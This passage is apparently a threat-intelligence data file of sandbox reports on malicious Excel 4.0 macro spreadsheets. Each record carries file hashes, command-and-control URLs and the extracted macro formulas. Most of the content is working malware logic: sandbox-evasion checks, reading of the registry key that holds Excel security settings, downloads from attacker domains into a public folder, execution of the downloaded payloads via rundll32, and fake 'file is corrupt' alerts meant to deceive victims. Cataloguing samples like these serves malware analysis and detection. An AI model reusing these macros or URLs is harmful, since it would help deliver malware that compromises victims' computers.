can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3083ef5bfcc2dbf577c804be43547c172759a339dc82f2f2aafd5dd6f7f641a1"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"3083ef5bfcc2dbf577c804be43547c172759a339dc82f2f2aafd5dd6f7f641a1","filesize":226304,"md5":"fecec8770395a605a69e37a00ce73c0c","sha1":"5807155a6dab0d24b8277ba3555d332a34c38bd3","sha256":"3083ef5bfcc2dbf577c804be43547c172759a339dc82f2f2aafd5dd6f7f641a1","sha512":"868c569d336ee1800ab8e01995b8102fcdfb7206dd44830953035013ceebf29d6f49e8fb7ac21d69625bea4b34477f2e4c4f06cb795aa3298fb2f97667b2042a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3083ef5bfcc2dbf577c804be43547c172759a339dc82f2f2aafd5dd6f7f641a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xsDefJZvpq\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"308fa851a857781283b9c35187dedb46035395eedfdfbb8b902dc3972345cb5e"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"308fa851a857781283b9c35187dedb46035395eedfdfbb8b902dc3972345cb5e","filesize":113664,"md5":"4f2cee00505cae96c980cca9d3562858","sha1":"feca52f70f82be06aece96c61b9a8eaa2657c929","sha256":"308fa851a857781283b9c35187dedb46035395eedfdfbb8b902dc3972345cb5e","sha512":"a10e203c75754598bb4992724d7cbe3127bba2b1a46f8c44c3ef17f803889f7c523e01ee911e38654a4ca895b7fa468fb2a9f767f64284b127ef90bb032d9683","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"308fa851a857781283b9c35187dedb46035395eedfdfbb8b902dc3972345cb5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1UkmHmnGDy\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30b0da0bc4f40b5bd5d0e076f9d2e8ad9842916f68bba89fc602c06c3408e372"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30b0da0bc4f40b5bd5d0e076f9d2e8ad9842916f68bba89fc602c06c3408e372","filesize":104448,"md5":"9cb9840fd0c08b7d9170d3d1b815d80b","sha1":"b67f370f3e655eef8d9358be6b2bf3818b8a2b8a","sha256":"30b0da0bc4f40b5bd5d0e076f9d2e8ad9842916f68bba89fc602c06c3408e372","sha512":"a4ca7b4dbb4e645f9d776566b5923df7c2f252e644f104c9c180884a7f2ddcc68629e8a366e53f557df4ec435abb7f4abfb54fd665c9ef502d26210826c61423","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30b0da0bc4f40b5bd5d0e076f9d2e8ad9842916f68bba89fc602c06c3408e372.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Tm5q0EYDlt\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30bfb55c3eb30ec182b8a1c28a4bd1664c4512403bd6e9575dcbbbf7a42b38cd"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30bfb55c3eb30ec182b8a1c28a4bd1664c4512403bd6e9575dcbbbf7a42b38cd","filesize":185344,"md5":"144560c44bd86e02cdbb45af16fa97eb","sha1":"c5e452e9f88b8bddc7b1a0a755e02436dc7accfe","sha256":"30bfb55c3eb30ec182b8a1c28a4bd1664c4512403bd6e9575dcbbbf7a42b38cd","sha512":"963cfb64e19d91ac9588abac0601cf482aea4370d40baa84c03313bea54c6301b98dac964a703a06cb3130ef5b2a7918d0545ddeed00a6118f1b22086ecf3371","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30bfb55c3eb30ec182b8a1c28a4bd1664c4512403bd6e9575dcbbbf7a42b38cd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30cf8d5736ac4e1c7b6b098460f34d1639db83d0e6b139ab3cae9a301bf60746"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30cf8d5736ac4e1c7b6b098460f34d1639db83d0e6b139ab3cae9a301bf60746","filesize":141312,"md5":"c5087043e76309675cb5bfe198bd6b7d","sha1":"cdee1ee046636dda79b2ca5f6b22bc25004b36d5","sha256":"30cf8d5736ac4e1c7b6b098460f34d1639db83d0e6b139ab3cae9a301bf60746","sha512":"ae8eb48ded9a983961b54cba4e90f0faa7a14de86cb9bf9f68dd51a4c7236e518401d129d6d49318b389fbccd34217d59681550b2ff734848ec538f3af37cafb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30cf8d5736ac4e1c7b6b098460f34d1639db83d0e6b139ab3cae9a301bf60746.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"sECb1xAjj9\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30e966e08dc7dc0a5eeee76a42673aac1d1116b690c1429621a4808a249029d9"},"analysis":{"reported":"2020-04-09T16:15:36Z","score":10},"files":[{"filename":"30e966e08dc7dc0a5eeee76a42673aac1d1116b690c1429621a4808a249029d9","filesize":209920,"md5":"9a74f71b026c1fb476128cc77e924e75","sha1":"8cb8dfabea87f3c41f8f130b72ddb9b848dedd5b","sha256":"30e966e08dc7dc0a5eeee76a42673aac1d1116b690c1429621a4808a249029d9","sha512":"d0c78ebff367a2b8b9d0afde4342ffb1dc89dbb50edd4523fbee288c8b11c111248fb900b02a79cf48e510640cd3bd9562ebe077c3f5e46bf52daf1fc3cdcaa1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30e966e08dc7dc0a5eeee76a42673aac1d1116b690c1429621a4808a249029d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HIruaqP3xR\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"30fbab767c4e389ccb94a0f02d5f9bdd0d0bc20525c3a6da1f3665adac2e92ba"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"30fbab767c4e389ccb94a0f02d5f9bdd0d0bc20525c3a6da1f3665adac2e92ba","filesize":167936,"md5":"60e98a6990b96059e52e8f1a1fb89f3c","sha1":"82498c25d54fe10f41a2b063c61c329fc65c6aa3","sha256":"30fbab767c4e389ccb94a0f02d5f9bdd0d0bc20525c3a6da1f3665adac2e92ba","sha512":"648ad82e2afac2ae93829673a05b7d9f6d734c40d3765f64e4a5204059c57baa6fb2a48a05d29a1d8871c0a7e00ebe650add0a20930904fc2d32fba50c14102e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"30fbab767c4e389ccb94a0f02d5f9bdd0d0bc20525c3a6da1f3665adac2e92ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FsMKPVkcLg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3104066d31f4f9d8bad12f422200fe1274e6a25b93805b8525ca7331d5e3a1a2"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"3104066d31f4f9d8bad12f422200fe1274e6a25b93805b8525ca7331d5e3a1a2","filesize":225280,"md5":"e15143cdd2a158b123d98b192e8933e8","sha1":"ed77dd51cb06e682b6df8429c99df1bc8644f8f7","sha256":"3104066d31f4f9d8bad12f422200fe1274e6a25b93805b8525ca7331d5e3a1a2","sha512":"7742a80debe5b9f6474b3a87e6c48f6d714b0552d3d2e08a57012bb44da9a7f72e8d72c3aacdc65fe8ff8c59cc26602d2496fa41657ccd57360b989ded53993f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3104066d31f4f9d8bad12f422200fe1274e6a25b93805b8525ca7331d5e3a1a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"W051MvY2Dx\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3107525b571c87b2d29c1ca8772063e7c881aace7cb7f66e351d54a8c5b7c48c"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"3107525b571c87b2d29c1ca8772063e7c881aace7cb7f66e351d54a8c5b7c48c","filesize":168448,"md5":"237552e54b1375efb9d07c8a662d76bc","sha1":"1173942b67a4045bd28e0483eadc9d890111b0a8","sha256":"3107525b571c87b2d29c1ca8772063e7c881aace7cb7f66e351d54a8c5b7c48c","sha512":"81d85c66560247db489e27e605e3d4876c8c4818cda9285bfd2eb9852e9a153870301c28740d6ddd36a4b11f5a794a746ff15b95c7e251cf9d91a375770bb9e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3107525b571c87b2d29c1ca8772063e7c881aace7cb7f66e351d54a8c5b7c48c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5tITZl5R64\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"310d358d5d1195733bb53c0887b4909382c35e8d21696995c8cc51342bfeb69d"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"310d358d5d1195733bb53c0887b4909382c35e8d21696995c8cc51342bfeb69d","filesize":170496,"md5":"e2466bc4b056b20ea95a5569c8ff10c4","sha1":"0e0f6fed8de4290c20718f443c00891bf9ae9daf","sha256":"310d358d5d1195733bb53c0887b4909382c35e8d21696995c8cc51342bfeb69d","sha512":"92d9a65467e14de0b89b573705d721bb6e2a369e7266a7ebc06747cc5d5dcbf051adfb08246885b60b1e47f333786b090a0a075e91bdacf7d559e42a7eaa0530","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"310d358d5d1195733bb53c0887b4909382c35e8d21696995c8cc51342bfeb69d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dpdJSpPMA3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"310f9ef5be860396f0e461cf2e0e70ec9cbd005831a6ff26157b6889dcd585f8"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"310f9ef5be860396f0e461cf2e0e70ec9cbd005831a6ff26157b6889dcd585f8","filesize":104448,"md5":"c2dcf1fa33ebf05b1a9896a825ca04fe","sha1":"752d9670404541530fcd16b9358351765eb383a6","sha256":"310f9ef5be860396f0e461cf2e0e70ec9cbd005831a6ff26157b6889dcd585f8","sha512":"a975c270c1081798d0f1b6a5c50f8442b84ba4eb06d590eab0231cacf74b8bcfc0da16fdbbbd00a519dabf3ba9f38782378b7192b7ebd9b46c2381c70c4030e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"310f9ef5be860396f0e461cf2e0e70ec9cbd005831a6ff26157b6889dcd585f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"7HMJy5dzrz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"311a97eea5f6d1d501b61c47eddf3729570482e51b6fd3b6e0e6ab9c4c8f203d"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"311a97eea5f6d1d501b61c47eddf3729570482e51b6fd3b6e0e6ab9c4c8f203d","filesize":225280,"md5":"f42dee5323e534e64ec0a3cad0c83073","sha1":"53067aa5b1ab4a8d27d7640c11bc8bae2b2b2d70","sha256":"311a97eea5f6d1d501b61c47eddf3729570482e51b6fd3b6e0e6ab9c4c8f203d","sha512":"385af6ab27e7addbb2f063ba5967359a26fa88e734f589aaccf235ea4a2fd4a0658898d7d484e3d29acd3f13a5dc466262c63a18eb7279406f77aff118489d19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"311a97eea5f6d1d501b61c47eddf3729570482e51b6fd3b6e0e6ab9c4c8f203d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VFJQUc97Nk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"312e3851f7057b15cd48386b1e0c49da66c61c90b0d115a10373820fbbcbf39a"},"analysis":{"reported":"2020-04-09T16:15:37Z","score":10},"files":[{"filename":"312e3851f7057b15cd48386b1e0c49da66c61c90b0d115a10373820fbbcbf39a","filesize":170496,"md5":"d4b6b4edaf3631fbbf3df58a5286d638","sha1":"43bfb8604d3136cf4dcd1e374b93f8d8bbaa0ed6","sha256":"312e3851f7057b15cd48386b1e0c49da66c61c90b0d115a10373820fbbcbf39a","sha512":"aaf5a550ae453529a96c61257604fb592b417778962335ca10b703211938785c21a903e436b316bcfd5e96ea81e027f27031ff547fa59a40d73956f36453057a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"312e3851f7057b15cd48386b1e0c49da66c61c90b0d115a10373820fbbcbf39a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"txWQD8xPK3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31389cac6cb82c9b68ed90b3b510197b6e8a0b8a53c8ba46c7d74260782b8d8f"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"31389cac6cb82c9b68ed90b3b510197b6e8a0b8a53c8ba46c7d74260782b8d8f","filesize":185344,"md5":"b67c01c84931098dc6ddca8026e2a51c","sha1":"c04ebf88cca87983dcb9fa579922ae40cdf3b2be","sha256":"31389cac6cb82c9b68ed90b3b510197b6e8a0b8a53c8ba46c7d74260782b8d8f","sha512":"475b0c6708698f95c21e5353372d00ac42cc5d3606899597feb8b43e13ed4761bb99b2ec5254a70fe76a43e2e9978459b00ee0ca5847651f1bb74dc8c135696f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31389cac6cb82c9b68ed90b3b510197b6e8a0b8a53c8ba46c7d74260782b8d8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"31407e3c168132bd8cc168ee1d1779517ab1238e332a20cefe5aef5ab53cbaed"},"analysis":{"reported":"2020-04-09T16:15:38Z","score":10},"files":[{"filename":"31407e3c168132bd8cc168ee1d1779517ab1238e332a20cefe5aef5ab53cbaed","filesize":185344,"md5":"9ee8741b72cd30fe07c619b3e05bcd3b","sha1":"fab868c4e77e2bd12d346048d690bebf60d288d9","sha256":"31407e3c168132bd8cc168ee1d1779517ab1238e332a20cefe5aef5ab53cbaed","sha512":"aab6ba83f2d796ac85f9823d7385f5a9eb7e7a827d11a08c9099ae2462a4b48c6a138684f98b9799458889bf4abb624821dfa52e75e1e420ba2a306d07416d66","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"31407e3c168132bd8cc168ee1d1779517ab1238e332a20cefe5aef5ab53cbaed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
